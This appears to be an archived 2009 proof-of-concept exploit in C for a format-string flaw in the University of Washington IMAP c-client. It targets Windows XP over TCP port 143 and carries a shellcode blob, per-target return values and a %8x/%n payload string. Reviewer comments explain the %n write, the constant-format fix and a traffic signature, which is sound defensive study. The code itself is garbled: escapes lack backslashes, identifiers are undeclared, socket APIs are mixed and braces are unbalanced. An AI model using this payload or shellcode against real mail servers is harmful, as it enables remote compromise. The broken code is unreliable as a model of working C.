
uwimap-format.txt

Posted on 20 February 2009

/*
 # This BUg Discover By Faryad Rahmany
 # C0d3d by Faryad rahmany
 # website : http://rahmany.net
 # University Of Washington IMAP c-client Remote FOrmat String
 # Shellcode based on work by vlad902
 # Greets to my best Freind : DJ7xpl
 # UG : File Host Port Target
 # Target 1 : WIndows XP Sp 1 : 0
 # Target 2 : Windows XP Sp 2 : 1
 # Target 3 : Windows XP Sp 3 : 2
 # Ep : Attack.exe 78.38.23.49 143 2
 # Sp Thanks To : AllaH
 # compiled with visual c++ 6 : Attack.c
*/

/*
 * Reading notes (added in review; every code token below is as archived).
 *
 * What the listing is: a proof-of-concept client for the format-string flaw
 * named in the header. main() selects a per-target 4-byte value from argv[3],
 * resolves argv[1], connects to TCP port 143 and writes one string whose
 * content carries printf conversion directives, including %n, as data.
 *
 * Why this matters to a defender: %n makes a printf-family call store a
 * count through a pointer taken from its argument list. A receiver that uses
 * remote text as the format argument therefore hands the sender a memory
 * write. The durable fix is on the receiving side: pass remote text only as
 * an argument to a constant format ("%s") and build with -Wformat and
 * -Wformat-security so non-literal formats are reported.
 *
 * What to look for: data sent to a service on TCP 143 that contains runs of
 * "%8x" followed by "%n". Legitimate IMAP traffic has no reason to carry
 * those sequences.
 *
 * State of the listing: it is damaged by extraction and does not build as
 * archived. Byte escapes in the string literals are garbled, one string
 * literal is split across a physical line, several identifiers are used
 * without a declaration, and BSD-socket and Winsock calls are mixed. Read it
 * as a historical record of the technique, not as working code.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Destination port passed to htons() below; 143 is the IMAP port. */
#define PORT 143
/* Size of the local staging/receive buffer. */
#define DATAOVERFLOW 2024

int main(int argc, char *argv[])
{
    int sockfd, numbytes;
    unsigned int system;          /* target selector parsed from argv[3] */
    char buffer[DATAOVERFLOW];
    char jmp[5];                  /* receives one of the winxpsp* values via strcat */
    struct hostent *he;
    struct sockaddr_in tcp;;
    struct sockaddr_in their_addr;

    /* Per-target values chosen by the switch below; the header comment maps
     * the targets to Windows XP SP1, SP2 and SP3. */
    char winxpsp1[] = "x57x94xAEx77"; // not tested
    char winxpsp2[] = "xEDx1Ex94x7C";
    char winxpsp3[] = "x7Bx46x86x7C";
    char FAR[] = "x47x45x54x20x2F";
    WSADATA wsadata;

    /* Opaque payload bytes; the header credits them to "work by vlad902".
     * Their content is not analysed here. */
    unsigned char shellcode[] =
        "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
        "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
        "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
        "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
        "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e"
        "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"
        "x4ex56x46x32x46x42x4bx48x45x44x4ex43x4bx38x4ex57"
        "x45x50x4ax57x41x50x4fx4ex4bx38x4fx54x4ax41x4bx48"
        "x4fx55x42x32x41x30x4bx4ex49x34x4bx48x46x53x4bx48"
        "x41x30x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
        "x46x37x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
        "x46x4fx4bx43x46x35x46x42x4ax52x45x47x45x4ex4bx48"
        "x4fx35x46x32x41x50x4bx4ex48x46x4bx58x4ex30x4bx34"
        "x4bx58x4fx35x4ex31x41x30x4bx4ex43x30x4ex42x4bx38"
        "x49x38x4ex36x46x52x4ex51x41x46x43x4cx41x53x4bx4d"
        "x46x56x4bx38x43x44x42x33x4bx58x42x44x4ex50x4bx58"
        "x42x47x4ex41x4dx4ax4bx58x42x34x4ax50x50x45x4ax56"
        "x50x58x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x46"
        "x43x35x48x46x4ax36x43x53x44x53x4ax46x47x47x43x47"
        "x44x33x4fx55x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
        "x4ex4fx4bx33x42x55x4fx4fx48x4dx4fx55x49x58x45x4e"
        "x48x56x41x38x4dx4ex4ax50x44x50x45x35x4cx36x44x50"
        "x4fx4fx42x4dx4ax36x49x4dx49x30x45x4fx4dx4ax47x55"
        "x4fx4fx48x4dx43x45x43x55x43x45x43x45x43x35x43x54"
        "x43x55x43x54x43x55x4fx4fx42x4dx48x36x4ax56x41x31"
        "x4ex45x48x56x43x45x49x48x41x4ex45x59x4ax46x46x4a"
        "x4cx31x42x47x47x4cx47x35x4fx4fx48x4dx4cx56x42x51"
        "x41x35x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52"
        "x49x4ex47x35x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d"
        "x4ax36x45x4ex49x34x48x58x49x34x47x55x4fx4fx48x4d"
        "x42x45x46x55x46x55x45x55x4fx4fx42x4dx43x49x4ax56"
        "x47x4ex49x47x48x4cx49x57x47x45x4fx4fx48x4dx45x35"
        "x4fx4fx42x4dx48x46x4cx36x46x46x48x46x4ax56x43x46"
        "x4dx46x49x48x45x4ex4cx56x42x35x49x35x49x32x4ex4c"
        "x49x58x47x4ex4cx36x46x54x49x48x44x4ex41x43x42x4c"
        "x43x4fx4cx4ax50x4fx44x44x4dx42x50x4fx44x54x4ex32"
        "x43x59x4dx58x4cx47x4ax53x4bx4ax4bx4ax4bx4ax4ax36"
        "x44x47x50x4fx43x4bx48x51x4fx4fx45x37x46x54x4fx4f"
        "x48x4dx4bx35x47x35x44x45x41x55x41x55x41x45x4cx56"
        "x41x50x41x45x41x55x45x35x41x35x4fx4fx42x4dx4ax46"
        "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx36"
        "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"
        "x43x38x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d"
        "x4ax46x42x4fx4cx38x46x50x4fx45x43x45x4fx4fx48x4d"
        "x4fx4fx42x4dx5a";

    /* Usage banner, printed when fewer than three arguments are present. */
    if(argc < 3){
        printf("*********************************************** "
               " This BUg Discover By Faryad Rahmany "
               " C0d3d by Faryad rahmany "
               " website : http://rahmany.net "
               " University Of Washington IMAP c-client Remote FOrmat String "
               " Shellcode based on work by vlad902 "
               " Greets to my best Freind : DJ7xpl "
               " UG : File Host Port Target "
               " Target 1 : WIndows XP Sp 1 : 0 "
               " Target 2 : Windows XP Sp 2 : 1 "
               " Target 3 : Windows XP Sp 3 : 2 "
               " Ep : Attack.exe 78.38.23.49 143 2 "
               " Sp Thanks To : AllaH "
               " compiled with visual c++ 6 : Attack.c "
               "*********************************************** ", argv[1]);
        exit(-1);
    }

    /* The next string literal is split across two physical lines in the
     * archived page; it is kept exactly as found. */
    printf(" Attack on 
University Of Washington IMAP c-client");

    /* argv[3] selects which per-target value is appended to jmp. */
    system = (unsigned short)atoi(argv[3]);
    switch(system) {
    case 1:
        strcat(jmp,winxpsp1);
        break;
    case 2:
        strcat(jmp,winxpsp2);
        break;
    case 3 :
        strcat(jmp,winxpsp3);
        break;
    default:
        printf(" this target not find this list and exit ");
        exit(-1);
    }

    /* Lays out the local buffer. The fprintf further down sends shellcode,
     * not this buffer, and recv() later overwrites it. */
    printf(" building Format string ");
    memset(buffer,shellcode,DATAOVERFLOW);
    memcpy(buffer,shellcode,sizeof(shellcode)-1);
    memcpy(buffer+256,jmp,sizeof(jmp)-1);
    memcpy(buffer+243,FAR,sizeof(FAR)-1);
    /* NOTE(review): index DATAOVERFLOW is one past the last element of
     * buffer[DATAOVERFLOW]. */
    buffer[DATAOVERFLOW] = 0;

    if (argc != 2) {
        fprintf(stderr,"usage: client hostname ");
        exit(1);
    }

    /* Resolve the host named in argv[1]. */
    if ((he=gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(1);
    }
    /* `addr` has no declaration anywhere in the listing. */
    if ((!he) && (addr == INADDR_NONE) ){
        printf("unable to resolve %s ",argv[1]);
        exit(-1);
    }

    /* `sock` has no declaration either; the descriptor actually connected
     * below is sockfd. */
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (!sock){
        printf("Fuck socket error ");
        exit(-1);
    }

    printf(" Attack on University Of Washington IMAP c-client %s " , argv[1]) ;
    Sleep(900);
    printf(" pachet Send size = %d byte " , sizeof(buffer));

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }
    /* Winsock initialisation appears after the socket() calls;
     * wVersionRequested has no declaration in the listing. */
    if ( WSAStartup(wVersionRequested, &wsadata) ) {
        printf ("Erreur d'initialisation winsock ! ");
        ExitProcess (1);
    }

    /* Destination: first resolved address, port PORT (143). */
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    their_addr.sin_addr = *((struct in_addr *)he-h_addr);
    bzero(&(their_addr.sin_zero), 8);

    printf(" Sending exploit string... ");
    printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );
    /* The literal backslash-n before sizeof is an extraction artefact, kept
     * as found. */
    if (connect(sockfd, (struct sockaddr *)&their_addr, \nsizeof(struct sockaddr)) == -1) {
        perror("connect");
        exit(1);
    }

    /* The message itself. Each directive is written with a doubled percent
     * sign so that this fprintf emits a literal '%': the %8x and %n
     * directives are data for the receiving side, not for this call. Only
     * %d (the computed width 0x3C63FF-0x4f) and %s (the payload) are
     * consumed locally. These directive runs are the signature to match in
     * captured traffic. FILEsock has no declaration in the listing. */
    fprintf(FILEsock, "xebx29"
            "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n%%n@@@@@@@@%s ",
            0x3C63FF-0x4f,shellcode);

    /* Read whatever the peer answers and print it. */
    if ((numbytes=recv(sockfd, buffer,DATAOVERFLOW, 0)) == -1) {
        perror("recv");
        exit(1);
    }
    /* NOTE(review): recv() may return DATAOVERFLOW, which makes this index
     * one past the end of buffer. The character constant is empty as
     * archived. */
    buffer[numbytes] = '';
    printf("Received: %s",buffer);
    shutdown(sockfd,1);
    closesocket(sockfd);
    /* The closing brace below has no matching opener in the archived text. */
    }
    return 0;
}

 
